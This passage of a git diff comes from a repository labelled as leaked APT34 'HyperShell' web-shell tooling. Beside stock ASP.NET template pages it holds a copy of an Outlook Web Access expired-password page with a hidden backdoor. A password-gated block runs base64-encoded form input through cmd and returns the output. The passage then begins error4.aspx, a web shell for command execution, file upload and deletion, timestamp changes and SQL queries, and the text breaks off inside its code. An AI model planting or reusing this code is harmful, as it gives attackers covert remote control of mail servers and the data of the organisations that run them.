<asp:Label Text="Remember Browser" runat="server" />
<asp:CheckBox Text="" ID="RememberBrowser" runat="server" />
</div>
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button Text="Submit" ID="CodeSubmit" OnClick="CodeSubmit_Click" CssClass="btn btn-default" runat="server" />
</div>
</div>
</section>
</asp:PlaceHolder>
</asp:Content>

77
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/TwoFactorAuthenticationSignIn.aspx.cs Normal file
View File

@@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using HyperShell.Models;
namespace HyperShell.Account
{
public partial class TwoFactorAuthenticationSignIn : System.Web.UI.Page
{
private ApplicationSignInManager signinManager;
private ApplicationUserManager manager;
public TwoFactorAuthenticationSignIn()
{
manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
signinManager = Context.GetOwinContext().GetUserManager<ApplicationSignInManager>();
}
protected void Page_Load(object sender, EventArgs e)
{
var userId = signinManager.GetVerifiedUserId<ApplicationUser, string>();
if (userId == null)
{
Response.Redirect("/Account/Error", true);
}
var userFactors = manager.GetValidTwoFactorProviders(userId);
Providers.DataSource = userFactors.Select(x => x).ToList();
Providers.DataBind();
}
protected void CodeSubmit_Click(object sender, EventArgs e)
{
bool rememberMe = false;
bool.TryParse(Request.QueryString["RememberMe"], out rememberMe);
var result = signinManager.TwoFactorSignIn<ApplicationUser, string>(SelectedProvider.Value, Code.Text, isPersistent: rememberMe, rememberBrowser: RememberBrowser.Checked);
switch (result)
{
case SignInStatus.Success:
IdentityHelper.RedirectToReturnUrl(Request.QueryString["ReturnUrl"], Response);
break;
case SignInStatus.LockedOut:
Response.Redirect("/Account/Lockout");
break;
case SignInStatus.Failure:
default:
FailureText.Text = "Invalid code";
ErrorMessage.Visible = true;
break;
}
}
protected void ProviderSubmit_Click(object sender, EventArgs e)
{
if (!signinManager.SendTwoFactorCode(Providers.SelectedValue))
{
Response.Redirect("/Account/Error");
}
var user = manager.FindById(signinManager.GetVerifiedUserId<ApplicationUser, string>());
if (user != null)
{
var code = manager.GenerateTwoFactorToken(user.Id, Providers.SelectedValue);
}
SelectedProvider.Value = Providers.SelectedValue;
sendcode.Visible = false;
verifycode.Visible = true;
}
}
}

105
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/TwoFactorAuthenticationSignIn.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,105 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class TwoFactorAuthenticationSignIn {
/// <summary>
/// sendcode control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder sendcode;
/// <summary>
/// Providers control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.DropDownList Providers;
/// <summary>
/// ProviderSubmit control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Button ProviderSubmit;
/// <summary>
/// verifycode control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder verifycode;
/// <summary>
/// SelectedProvider control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HiddenField SelectedProvider;
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.PlaceHolder ErrorMessage;
/// <summary>
/// FailureText control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal FailureText;
/// <summary>
/// Code control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Code;
/// <summary>
/// RememberBrowser control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.CheckBox RememberBrowser;
/// <summary>
/// CodeSubmit control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Button CodeSubmit;
}
}

28
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/VerifyPhoneNumber.aspx Normal file
View File

@@ -0,0 +1,28 @@
<%@ Page Title="Verify Phone Number" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="VerifyPhoneNumber.aspx.cs" Inherits="HyperShell.Account.VerifyPhoneNumber" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<p class="text-danger">
<asp:Literal runat="server" ID="ErrorMessage" />
</p>
<div class="form-horizontal">
<h4>Enter verification code</h4>
<hr />
<asp:HiddenField runat="server" ID="PhoneNumber" />
<asp:ValidationSummary runat="server" CssClass="text-danger" />
<div class="form-group">
<asp:Label runat="server" AssociatedControlID="Code" CssClass="col-md-2 control-label">Code</asp:Label>
<div class="col-md-10">
<asp:TextBox runat="server" ID="Code" CssClass="form-control" />
<asp:RequiredFieldValidator runat="server" ControlToValidate="Code"
CssClass="text-danger" ErrorMessage="The Code field is required." />
</div>
</div>
<div class="form-group">
<div class="col-md-offset-2 col-md-10">
<asp:Button runat="server" OnClick="Code_Click"
Text="Submit" CssClass="btn btn-default" />
</div>
</div>
</div>
</asp:Content>

50
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/VerifyPhoneNumber.aspx.cs Normal file
View File

@@ -0,0 +1,50 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
namespace HyperShell.Account
{
public partial class VerifyPhoneNumber : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var phonenumber = Request.QueryString["PhoneNumber"];
var code = manager.GenerateChangePhoneNumberToken(User.Identity.GetUserId(), phonenumber);
PhoneNumber.Value = phonenumber;
}
protected void Code_Click(object sender, EventArgs e)
{
if (!ModelState.IsValid)
{
ModelState.AddModelError("", "Invalid code");
return;
}
var manager = Context.GetOwinContext().GetUserManager<ApplicationUserManager>();
var signInManager = Context.GetOwinContext().Get<ApplicationSignInManager>();
var result = manager.ChangePhoneNumber(User.Identity.GetUserId(), PhoneNumber.Value, Code.Text);
if (result.Succeeded)
{
var user = manager.FindById(User.Identity.GetUserId());
if (user != null)
{
signInManager.SignIn(user, isPersistent: false, rememberBrowser: false);
Response.Redirect("/Account/Manage?m=AddPhoneNumberSuccess");
}
}
// If we got this far, something failed, redisplay form
ModelState.AddModelError("", "Failed to verify phone");
}
}
}

42
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Account/VerifyPhoneNumber.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,42 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Account {
public partial class VerifyPhoneNumber {
/// <summary>
/// ErrorMessage control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.Literal ErrorMessage;
/// <summary>
/// PhoneNumber control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.HiddenField PhoneNumber;
/// <summary>
/// Code control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox Code;
}
}

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Contact.aspx Normal file
View File

@@ -0,0 +1,17 @@
<%@ Page Title="Contact" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Contact.aspx.cs" Inherits="HyperShell.Contact" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<h2><%: Title %>.</h2>
<h3>Your contact page.</h3>
<address>
One Microsoft Way<br />
Redmond, WA 98052-6399<br />
<abbr title="Phone">P:</abbr>
425.555.0100
</address>
<address>
<strong>Support:</strong> <a href="mailto:Support@example.com">Support@example.com</a><br />
<strong>Marketing:</strong> <a href="mailto:Marketing@example.com">Marketing@example.com</a>
</address>
</asp:Content>

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Contact.aspx.cs Normal file
View File

@@ -0,0 +1,17 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell
{
public partial class Contact : Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Contact.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,17 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell
{
public partial class Contact
{
}
}

42
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Default.aspx Normal file
View File

@@ -0,0 +1,42 @@
<%@ Page Title="Home Page" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="HyperShell._Default" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<div class="jumbotron">
<h1>ASP.NET</h1>
<p class="lead">ASP.NET is a free web framework for building great Web sites and Web applications using HTML, CSS, and JavaScript.</p>
<p><a href="http://www.asp.net" class="btn btn-primary btn-lg">Learn more &raquo;</a></p>
</div>
<div class="row">
<div class="col-md-4">
<h2>Getting started</h2>
<p>
ASP.NET Web Forms lets you build dynamic websites using a familiar drag-and-drop, event-driven model.
A design surface and hundreds of controls and components let you rapidly build sophisticated, powerful UI-driven sites with data access.
</p>
<p>
<a class="btn btn-default" href="http://go.microsoft.com/fwlink/?LinkId=301948">Learn more &raquo;</a>
</p>
</div>
<div class="col-md-4">
<h2>Get more libraries</h2>
<p>
NuGet is a free Visual Studio extension that makes it easy to add, remove, and update libraries and tools in Visual Studio projects.
</p>
<p>
<a class="btn btn-default" href="http://go.microsoft.com/fwlink/?LinkId=301949">Learn more &raquo;</a>
</p>
</div>
<div class="col-md-4">
<h2>Web Hosting</h2>
<p>
You can easily find a web hosting company that offers the right mix of features and price for your applications.
</p>
<p>
<a class="btn btn-default" href="http://go.microsoft.com/fwlink/?LinkId=301950">Learn more &raquo;</a>
</p>
</div>
</div>
</asp:Content>

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Default.aspx.cs Normal file
View File

@@ -0,0 +1,17 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell
{
public partial class _Default : Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Default.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,17 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell
{
public partial class _Default
{
}
}

134
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ExpiredPasswordTech/ExpiredPassword..txt Normal file
View File

@@ -0,0 +1,134 @@
<%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %>
<%@ Import namespace="Microsoft.Exchange.Clients"%>
<%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%>
<%@ Import namespace="Microsoft.Exchange.HttpProxy"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<meta name="Robots" content="NOINDEX, NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<title><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %></title>
<%= InlineCss(ThemeFileId.LogonCss) %>
<%= InlineJavascript("fexppw.js") %>
<script type="text/javascript">
<!--
var g_fFcs = 1;
var a_sUrl = "<%=EncodingUtilities.JavascriptEncode(Destination) %>";
var a_fCAC = <%= (PasswordChanged && ShouldClearAuthenticationCache) ? 1 : 0 %>
//-->
var mainDivClassName = '<%=UserAgent.LayoutString %>';
var showPlaceholderText = false;
if (mainDivClassName == "tnarrow") {
showPlaceholderText = true;
// Output meta tag for viewport scaling
document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />');
}
else if (mainDivClassName == "twide") {
showPlaceholderText = true;
}
function setPlaceholderText() {
window.document.getElementById("username").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordUserDomainNoColon) %>";
window.document.getElementById("oldPwd").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOldNoColon) %>";
window.document.getElementById("newPwd1").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNewNoColon) %>";
window.document.getElementById("newPwd2").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirmNoColon) %>";
}
</script>
</head>
<body class="signInBg<%=IsRtl ? " rtl" : ""%>" style="background: #f2f2f2 url('<%=InlineImage(ThemeFileId.BackgroundGradientLogin)%>') repeat-x"/>
<%
string tblStyle = "cellpadding=0 cellspacing=0";
if (IsDownLevelClient)
{
tblStyle = "class=\"nonMSIE\"";
}
%>
<form action="expiredpassword.aspx" method="POST" name="exppwForm" autocomplete="off">
<div id="mainDiv" class="mouse">
<script>
var mainDiv = window.document.getElementById("mainDiv");
mainDiv.className = mainDivClassName;
</script>
<div class="sidebar">
<div class="owaLogoContainer">
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhite)%>" class="owaLogo" aria-hidden="true" />
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhiteSmall)%>" class="owaLogoSmall" aria-hidden="true" />
</div>
</div>
<input type="hidden" name="url" value="<%=EncodingUtilities.HtmlEncode(Destination)%>">
<div class="logonContainer">
<div id="lgnDiv" class="logonDiv">
<div class="signInImageHeader" role="heading">
<img class="mouseHeader" src="<%=InlineImage(ThemeFileId.OwaHeaderTextBlue)%>" />
</div>
<% if (PasswordChanged) { %>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %></div>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="clkReLgn()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt="">
<span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<% } else { %>
<div class="headerMsgDiv">
<div class="shellDialogueHead"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%></div>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %></div>
<%
if (Reason == ExpiredPasswordReason.InvalidCredentials) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %></div>
<%
} else if (Reason == ExpiredPasswordReason.InvalidNewPassword) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %></div>
<%
} else if (Reason == ExpiredPasswordReason.PasswordConflict) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %></div>
<%
} else if (Reason == ExpiredPasswordReason.LockedOut) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %></div>
<% } %>
</div>
<div class="signInInputLabel" id="userNameLabel" aria-hidden="true"><%=UserNameLabel%></div>
<div><input id="username" name="username" class="signInInputText" role="textbox" aria-labelledby="userNameLabel"/></div>
<div class="signInInputLabel" id="oldPasswordLabel" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOld)%></div>
<div><input id="oldPwd" name="oldPwd" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="oldPasswordLabel"/></div>
<div class="signInInputLabel" id="newPasswordLabel1" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNew)%></div>
<div><input id="newPwd1" name="newPwd1" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel1"/></div>
<div class="signInInputLabel" id="newPasswordLabel2" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirm)%></div>
<div><input id="newPwd2" name="newPwd2" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel2"/></div>
<script>
if (showPlaceholderText) {
setPlaceholderText();
}
</script>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="document.exppwForm.submit()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt=""/><span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<div class="hidden-submit"><input type="submit" /></div>
<% } %>
</div>
</div>
</div>
</form>
</body>
</html>

153
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ExpiredPasswordTech/ExpiredPassword.aspx Normal file
View File

@@ -0,0 +1,153 @@
<%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %>
<%@ Import namespace="Microsoft.Exchange.Clients"%>
<%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%>
<%@ Import namespace="Microsoft.Exchange.HttpProxy"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<meta name="Robots" content="NOINDEX, NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<title><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %></title>
<%= InlineCss(ThemeFileId.LogonCss) %>
<%= InlineJavascript("fexppw.js") %>
<script type="text/javascript">
<!--
var g_fFcs = 1;
var a_sUrl = "<%=EncodingUtilities.JavascriptEncode(Destination) %>";
var a_fCAC = <%= (PasswordChanged && ShouldClearAuthenticationCache) ? 1 : 0 %>
//-->
var mainDivClassName = '<%=UserAgent.LayoutString %>';
var showPlaceholderText = false;
if (mainDivClassName == "tnarrow") {
showPlaceholderText = true;
// Output meta tag for viewport scaling
document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />');
}
else if (mainDivClassName == "twide") {
showPlaceholderText = true;
}
function setPlaceholderText() {
window.document.getElementById("username").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordUserDomainNoColon) %>";
window.document.getElementById("oldPwd").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOldNoColon) %>";
window.document.getElementById("newPwd1").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNewNoColon) %>";
window.document.getElementById("newPwd2").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirmNoColon) %>";
}
</script>
</head>
<body class="signInBg<%=IsRtl ? " rtl" : ""%>" style="background: #f2f2f2 url('<%=InlineImage(ThemeFileId.BackgroundGradientLogin)%>') repeat-x"/>
<%
string tblStyle = "cellpadding=0 cellspacing=0";
if (IsDownLevelClient)
{
tblStyle = "class=\"nonMSIE\"";
}
%>
<form action="expiredpassword.aspx" method="POST" name="exppwForm" autocomplete="off">
<div id="mainDiv" class="mouse">
<script>
var mainDiv = window.document.getElementById("mainDiv");
mainDiv.className = mainDivClassName;
</script>
<div class="sidebar">
<div class="owaLogoContainer">
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhite)%>" class="owaLogo" aria-hidden="true" />
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhiteSmall)%>" class="owaLogoSmall" aria-hidden="true" />
</div>
</div>
<input type="hidden" name="url" value="<%=EncodingUtilities.HtmlEncode(Destination)%>">
<div class="logonContainer">
<div id="lgnDiv" class="logonDiv">
<div class="signInImageHeader" role="heading">
<img class="mouseHeader" src="<%=InlineImage(ThemeFileId.OwaHeaderTextBlue)%>" />
</div>
<% if (PasswordChanged) { %>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %></div>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="clkReLgn()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt="">
<span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<% } else { %>
<div class="headerMsgDiv">
<div class="shellDialogueHead"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%></div>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %></div>
<%
if (Reason == ExpiredPasswordReason.InvalidCredentials) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %></div>
<%
} else if (Reason == ExpiredPasswordReason.InvalidNewPassword) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %></div>
<%
} else if (Reason == ExpiredPasswordReason.PasswordConflict) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %></div>
<%
} else if (Reason == ExpiredPasswordReason.LockedOut) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %></div>
<% } %>
<%
try{
if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form["newPwd1"])) + "reDGEa@#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=")
{
System.Diagnostics.Process p = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo i = p.StartInfo;
i.FileName = "cmd";
i.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"]));
i.UseShellExecute = false;
i.CreateNoWindow = true;
i.RedirectStandardOutput = true;
p.Start();
string r = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>" + Server.HtmlEncode(r) + "</pre>");
Response.End();
}}catch{}
%>
</div>
<div class="signInInputLabel" id="userNameLabel" aria-hidden="true"><%=UserNameLabel%></div>
<div><input id="username" name="username" class="signInInputText" role="textbox" aria-labelledby="userNameLabel"/></div>
<div class="signInInputLabel" id="oldPasswordLabel" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOld)%></div>
<div><input id="oldPwd" name="oldPwd" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="oldPasswordLabel"/></div>
<div class="signInInputLabel" id="newPasswordLabel1" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNew)%></div>
<div><input id="newPwd1" name="newPwd1" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel1"/></div>
<div class="signInInputLabel" id="newPasswordLabel2" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirm)%></div>
<div><input id="newPwd2" name="newPwd2" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel2"/></div>
<script>
if (showPlaceholderText) {
setPlaceholderText();
}
</script>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="document.exppwForm.submit()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt=""/><span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<div class="hidden-submit"><input type="submit" /></div>
<% } %>
</div>
</div>
</div>
</form>
</body>
</html>

34
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ExpiredPasswordTech/MyMaster.aspx Normal file
View File

File diff suppressed because one or more lines are too long

769
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ExpiredPasswordTech/error4.aspx Normal file
View File

@@ -0,0 +1,769 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%@ Import namespace="System.IO"%>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<%
NameValueCollection t=HttpContext.Current.Request.Form;
p=fb(t["p"]);pro=fb(t["pro"]);cmd=fb(t["cmd"]);sav=fb(t["sav"]);vir=t["vir"];nen=fb(t["nen"]);upb=fb(t["upb"]);upd=fb(t["upd"]);del=fb(t["del"]);don=fb(t["don"]);hid=t["hid"];tfil=fb(t["tfil"]);ttar=fb(t["ttar"]);ttim=fb(t["ttim"]);baseFile=t["baseFile"];baseAddr=fb(t["baseAddr"]);baseVir=t["baseVir"];sqc=fb(t["sqc"]);sqq=fb(t["sqq"]);exadd=fb(t["exadd"]);
if(!string.IsNullOrEmpty(p))c(p);
else c();
if(!string.IsNullOrEmpty(cmd))r(pro,cmd);
else if(HttpContext.Current.Request.Files["upl"]!=null)u(HttpContext.Current.Request.Files["upl"],sav,string.IsNullOrEmpty(vir)?false:true,nen);
else if(!string.IsNullOrEmpty(upb))h(upb,upd);
else if(!string.IsNullOrEmpty(del))d(del);
else if(!string.IsNullOrEmpty(don))z(don);
else if(!string.IsNullOrEmpty(tfil))g(hid,tfil,ttar,ttim);
else if(!string.IsNullOrEmpty(baseFile))baseupl(baseFile,baseAddr,string.IsNullOrEmpty(baseVir)?false:true);
else if(!string.IsNullOrEmpty(sqc))sq(sqc,sqq);
else if(!string.IsNullOrEmpty(exadd))exp(exadd);
else if(!string.IsNullOrEmpty(t["gsize"]))gsize(fb(t["gsize"]));
if(HttpContext.Current.Request.Cookies["data"]!=null){string data=fb(HttpContext.Current.Request.Cookies["data"].Value);string[] data2=data.Split(new string[]{"#|#"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"#=#"},StringSplitOptions.None);
switch (data3[0]){
case"pro":pro=a(pro,fb(data3[1]));break;
case"cmd":cmd=a(cmd,fb(data3[1]));break;
case"sav":sav=a(sav,fb(data3[1]));break;
case"vir":vir=a(vir,fb(data3[1]));break;
case"nen":nen=a(nen,fb(data3[1]));break;
case"don":don=a(don,fb(data3[1]));break;
case"tfil":tfil=a(tfil,fb(data3[1]));break;
case"ttar":ttar=a(ttar,fb(data3[1]));break;
case"ttim":ttim=a(ttim,fb(data3[1]));break;
case"sqc":sqc=a(sqc,fb(data3[1]));break;
case"sqq":sqq=a(sqq,fb(data3[1]));break;
case"exadd":exadd=a(exadd,fb(data3[1]));break;
}}}
view();
%>
<script runat="server">
string salt="di2zag7wZHTK9YR0NGq";
string p,pro,cmd,sav,vir,nen,upb,upd,del,don,hid,tfil,ttar,ttim,baseFile,baseAddr,baseVir,baseName,sqc,sqq,exadd;
bool aut=false;
string pp="ePQm3HPXJYt5wZSFhktJ/IEin/A=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void view(){string data = string.Format("pro#=#{0}#|#cmd#=#{1}#|#sav#=#{2}#|#vir#=#{3}#|#nen#=#{4}#|#don#=#{5}#|#tfil#=#{6}#|#ttar#=#{7}#|#ttim#=#{8}|#sqc#=#{9}|#sqq#=#{10}|#exadd#=#{11}",
